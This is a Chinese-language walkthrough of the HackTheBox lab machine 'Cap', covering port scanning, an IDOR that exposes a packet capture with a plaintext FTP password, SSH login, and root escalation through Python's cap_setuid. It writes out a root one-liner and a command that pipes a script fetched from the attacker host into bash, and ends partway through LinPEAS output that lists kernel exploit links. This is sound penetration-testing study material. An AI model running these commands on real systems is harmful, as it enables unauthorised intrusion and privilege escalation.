No.5--HackTheBox--Cap

HackTheBox--Cap

Linux

难度:Eazy

Cap是一台运行HTTP服务器的简易Linux机器，该服务器执行管理功能，包括执行网络捕获。不适当的控制会导致不安全的直接对象引用（IDOR），从而允许访问其他用户的捕获。捕获包含明文凭证，可用于获得立足点。然后利用Linux功能升级到根用户。

---

操作步骤

扫描

发现三个tcp端口 21 22 80

┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC 10.129.235.149                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 22:30 EST
Stats: 0:01:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 22:32 (0:00:39 remaining)
Nmap scan report for 10.129.235.149
Host is up (0.37s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Thu, 07 Nov 2024 03:30:56 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 07 Nov 2024 03:30:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 07 Nov 2024 03:30:49 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=11/6%Time=672C3468%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,1FBC,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\
SF:x20Thu,\x2007\x20Nov\x202024\x2003:30:48\x20GMT\r\nConnection:\x20close
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20
SF:19386\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\
SF:">\n\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20
SF:\x20<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x
SF:20\x20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-sca
SF:le=1\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"im
SF:age/png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x
SF:20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/
SF:font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\
SF:x20href=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20r
SF:el=\"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20
SF:\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.mi
SF:n\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/stati
SF:c/css/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOpt
SF:ions,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Thu,
SF:\x2007\x20Nov\x202024\x2003:30:49\x20GMT\r\nConnection:\x20close\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20OPTIONS,\x20HEAD
SF:,\x20GET\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20t
SF:ext/html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\
SF:x20\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<bod
SF:y>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Inv
SF:alid\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;R
SF:TSP/1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,
SF:189,"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x
SF:20Thu,\x2007\x20Nov\x202024\x2003:30:56\x20GMT\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x202
SF:32\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\
SF:x20Final//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</
SF:h1>\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20
SF:server\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x2
SF:0check\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.67 seconds
                                                                

---

在渗透测试和网络扫描中，TCP 端口往往是重点关注的对象，原因主要包括以下几个方面：

1. TCP 更常用于可靠的服务和应用

• 大多数常用的网络服务（如 HTTP、HTTPS、SSH、FTP、SMTP 等）都运行在 TCP 上。TCP 提供面向连接的通信，并确保数据包按顺序、无丢失地到达，因此适合应用层的许多高可靠性需求。

• 渗透测试中我们通常针对这些服务寻找漏洞，因此主要关注 TCP 端口。例如，常见的 Web 应用、数据库、远程登录协议都在 TCP 端口上运行。

2. UDP 端口扫描较为复杂

• UDP 是无连接的协议，没有三次握手过程，所以很难判断目标端口是否真的开放。使用 UDP 进行端口扫描通常效率较低，容易受到防火墙的丢包或过滤影响，并且回报的可靠性较低。

• 扫描 UDP 端口需要发送特殊的数据包，并等待应用层响应，导致扫描耗时较长、结果不稳定，False Negative（假阴性）情况比较多。因此，通常在进行初步枚举时优先选择 TCP 端口。

3. TCP 扫描更快速、全面

• Nmap 的 TCP 连接扫描（如 -sS SYN 扫描）非常高效，能够快速检测到开放的 TCP 端口，而且较少触发报警。TCP 扫描的速度和可靠性更高，能够让我们更快得到网络的服务状况。

• 对于 OSCP 考试或实际渗透测试的时间限制，快速找到更多可利用的服务是关键，因此我们会优先考虑 TCP 端口。

4. TCP 提供更多的攻击面

• TCP 服务通常会包含丰富的交互和认证过程，往往包含更复杂的协议栈实现，因此也更容易出现漏洞。例如，SQL 注入、RCE（远程代码执行）、认证绕过等大多发生在 TCP 协议上。

• UDP 通常用于简化、低开销的服务（如 DNS、SNMP、NTP），它们的攻击面相对有限，利用难度较大。渗透测试人员会优先把时间和精力集中在可能带来更多攻击机会的 TCP 服务上。

  ---

 尝试匿名登录21端口的ftp服务

被拒绝

ftp 10.129.235.149
Connected to 10.129.235.149.
220 (vsFTPd 3.0.3)
Name (10.129.235.149:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed

访问80端口的http服务

根据nmap扫描,发现运行的http服务为gunicorn

 点击左侧的Security Snapshot(5 Second PCAP+ Analysis)可以看到一个快照

点击download下载这个包,用wires hark打开,没什么有用的东西

注意:
发现每点击一次Security Snapshot(5 Second PCAP+ Analysis)则会出现一个新的url,

所以可以尝试路径/data/0来检查是否有之前的用户生成的快照.

---

不安全直接对象引用（IDOR）

IDOR漏洞，攻击者可以操纵请求的url或参数来访问他们不打算访问的对象。这些漏洞看起来微不足道，但却无处不在（比如美国国防部、政党网站、ZenDesk和Parler）。

---

确实发现了一个不同寻常的资源

下载

使用wireshark打开

获取到一组用户名和密码

36    4.126500    192.168.196.1    192.168.196.16    FTP    69    Request: USER nathan

40    5.424998    192.168.196.1    192.168.196.16    FTP    78    Request: PASS Buck3tH4TF0RM3!

---

wires hark常用搜索功能

1.使用协议过滤器

ftp.request.command == "USER" || ftp.request.command == "PASS"

http.request.method == "POST"

smtp.req.parameter == "AUTH" || pop.request.command == "USER" || pop.request.command == "PASS"

2.使用字符串搜索

edit-find packet-string

---

拿到第一个flag

使用获取的用户名和密码登录FTP服务

发现一个目标txt文件

---

尝试登录22端口

使用同一组用户名密码可以直接登录,

但是没有root权限

ssh nathan@10.129.235.149
nathan@10.129.235.149's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov  7 07:42:37 UTC 2024

  System load:           0.0
  Usage of /:            36.8% of 8.73GB
  Memory usage:          22%
  Swap usage:            0%
  Processes:             228
  Users logged in:       0
  IPv4 address for eth0: 10.129.235.149
  IPv6 address for eth0: dead:beef::250:56ff:feb0:2cd8

  => There are 4 zombie processes.

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Nov  7 05:45:44 2024 from 10.10.14.38
nathan@cap:~$ ls
user.txt
nathan@cap:~$ cd ..
nathan@cap:/home$ cd ..
nathan@cap:/$ cd root
-bash: cd: root: Permission denied

---

提权

手动搜索

nathan@cap:/$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep

命令的组成

• getcap：这是 Linux 系统中的一个命令，用于显示文件的 Capabilities。Capabilities 是 Linux 上的特权控制机制，它将传统 root 权限细分为多个小的权限单元，可以单独分配给不同的程序或文件。例如，一个程序可以获得 “绑定到低号端口” 的权限而无需拥有完整的 root 权限。

• -r：这是 getcap 命令的递归选项，表示对指定目录及其所有子目录中的文件进行递归扫描。在本命令中，-r / 表示从根目录开始扫描，即查找整个文件系统中带有 Capabilities 的文件。

• /：根目录，表示从系统的最顶层开始搜索。因为我们希望全面地查找系统中所有的 Capabilities 文件，所以从根目录 / 开始递归是最有效的方式。

• 2>/dev/null：这是一个重定向命令，用来忽略并丢弃标准错误输出。因为扫描系统根目录通常会遇到一些没有权限访问的文件或目录，这些会产生错误信息。如果不想看到这些错误信息，可以将它们重定向到 /dev/null，即丢弃掉不显示在屏幕上。

  ---

重点关注以下 Capabilities

• cap_setuid：允许进程修改用户 ID。如果某个解释器（如 Python、Perl）或命令（如 vim、nano）具有该权限，通常可以直接提权。

• cap_net_bind_service：允许绑定低于 1024 的端口，通常只有 root 用户可以绑定低端口。尽管此能力不直接影响权限提升，但在某些环境中可以协助攻击（如运行恶意 Web 服务）。

• cap_sys_admin：允许执行许多特权操作，如挂载文件系统、启动/停止系统服务等。具有此权限的二进制文件可以是高价值目标。

---

使用python3.8提权

cap_setuid,cap_net_bind_service+eip

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

-c :直接执行后面的代码

获得root权限,得到flag

nathan@cap:/$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:/# 
root@cap:/# ls
bin  boot  cdrom  dev  etc  home  lib  lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  sys  tmp  usr  var
root@cap:/# cd root
root@cap:/root# ls
root.txt  snap

---

使用脚本LinPEAS搜索

下载linpeas.sh脚本到攻击机Release Release refs/heads/master 20241101-6f46e855 · peass-ng/PEASS-ng

 在攻击机开启服务

python3 -m http.server 80

在靶机的ssh中下载脚本并通过通道给bash运行

curl http://10.10.14.38/linpeas.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0  808k    0  3984    0     0   5740      0  0:02:24 --:--:--  0:02:24  5732


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |                                                                                                       
    |---------------------------------------------------------------------------------|                                                                                                       
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |                                                                                                       
    |         Follow on Twitter         :     @hacktricks_live                        |                                                                                                       
    |         Respect on HTB            :     SirBroccoli                             |                                                                                                       
    |---------------------------------------------------------------------------------|                                                                                                       
    |                                 Thank you!                                      |                                                                                                       
    \---------------------------------------------------------------------------------/                                                                                                       
          LinPEAS-ng by carlospolop                                                                                                                                                           
                                                                                                                                                                                              
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.                                                                                                  
                                                                                                                                                                                              
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:                                                                                                                                                                                      
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting LinPEAS. Caching Writable Folders...
                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                                                                                                           
                               ╚═══════════════════╝                                                                                                                                          
OS: Linux version 5.4.0-80-generic (buildd@lcy01-amd64-030) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021
User & Groups: uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
Hostname: cap

[+] /usr/bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)                       
[+] /usr/bin/nc is available for network discovery & port scanning (LinPEAS can discover hosts and scan ports, learn more with -h)                                                            
                                                                                                                                                                                              

 32  808k   32  265k    0     0  24121      0  0:00:34  0:00:11  0:00:23 24121DONEing directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
                                                                                                                                                                                              
 45  808k   45  365k    0     0  28767      0  0:00:28  0:00:13  0:00:15 28767                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════                                                                                                            
                              ╚════════════════════╝                                                                                                                                          
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits                                                                                                            
Linux version 5.4.0-80-generic (buildd@lcy01-amd64-030) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021                                         
Distributor ID: Ubuntu
Description:    Ubuntu 20.04.2 LTS
Release:        20.04
Codename:       focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version                                                                                                               
Sudo version 1.8.31                                                                                                                                                                           


╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                                                                                       
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin                                                                                            

╔══════════╣ Date & uptime
Thu Nov  7 14:05:59 UTC 2024                                                                                                                                                                  
 14:05:59 up 10:43,  1 user,  load average: 0.30, 0.07, 0.02

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                                                                                                                                     
/dev/disk/by-id/dm-uuid-LVM-2om9fd1B3Q2r7E8yJyxwbZF4JCSUIQCqYgbAERHfSMVI2q5K9TyUTeGzFxbyZN4a / ext4 defaults 0 0                                                                              
/dev/disk/by-uuid/d3d1cf9e-20c6-450f-b152-9854f6a804ad /boot ext4 defaults 0 0
/dev/sda4       none    swap    sw      0       0
proc    /proc   proc    defaults,hidepid=2      0       0

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                                                                                                                                                          
sda
sda1
sda2
sda3
sda4

╔══════════╣ Environment
╚ Any private information inside environment variables?                                                                                                                                       
SHELL=/bin/bash                                                                                                                                                                               
PWD=/home/nathan
LOGNAME=nathan
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/nathan
LANG=C.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=10.10.14.38 58020 10.129.235.149 22
LESSCLOSE=/usr/bin/lesspipe %s %s
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=| /usr/bin/lesspipe %s
USER=nathan
SHLVL=1
XDG_SESSION_ID=17
XDG_RUNTIME_DIR=/run/user/1001
SSH_CLIENT=10.10.14.38 58020 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
SSH_TTY=/dev/pts/0
_=/usr/bin/env

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed                                                                                        
dmesg Not Found                                                                                                                                                                               
                                                                                                                                                                                              
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                                            
[+] [CVE-2022-2586] nft_object UAF                                                                                                                                                            

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154


Vulnerable to CVE-2021-3560

╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.                                                                                                 
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found                                                                                                                                      
═╣ PaX bins present? .............. PaX Not Found                                                                                                                                             
═╣ Execshield enabled? ............ Execshield Not Found                                                                                                                                      
═╣ SELinux enabled? ............... sestatus Not Found                                                                                                                                        
═╣ Seccomp enabled? ............... disabled                                                                                                                                                  
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)                                                                                                                                              

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════                                                                                                           
                                   ╚═══════════╝                                                                                                                                              
╔══════════╣ Container related tools present (if any):
/snap/bin/lxc                                                                                                                                                                                 
╔══════════╣ Container details
═╣ Is this a container? ........... No                                                                                                                                                        
═╣ Any running containers? ........ No                                                                                                                                                        
                                                                                                                                                                                              

                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════                                                                                                           
                                     ╚═══════╝                                                                                                                                                
bash: line 2211: check_aliyun_ecs: command not found
grep: /etc/cloud/cloud.cfg: No such file or directory
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No
═╣ Aliyun ECS? .......................... 
═╣ Tencent CVM? ......................... No                                                                                                                                                  



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                                                                                                            
                ╚════════════════════════════════════════════════╝                                                                                                                            
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes                                                                   
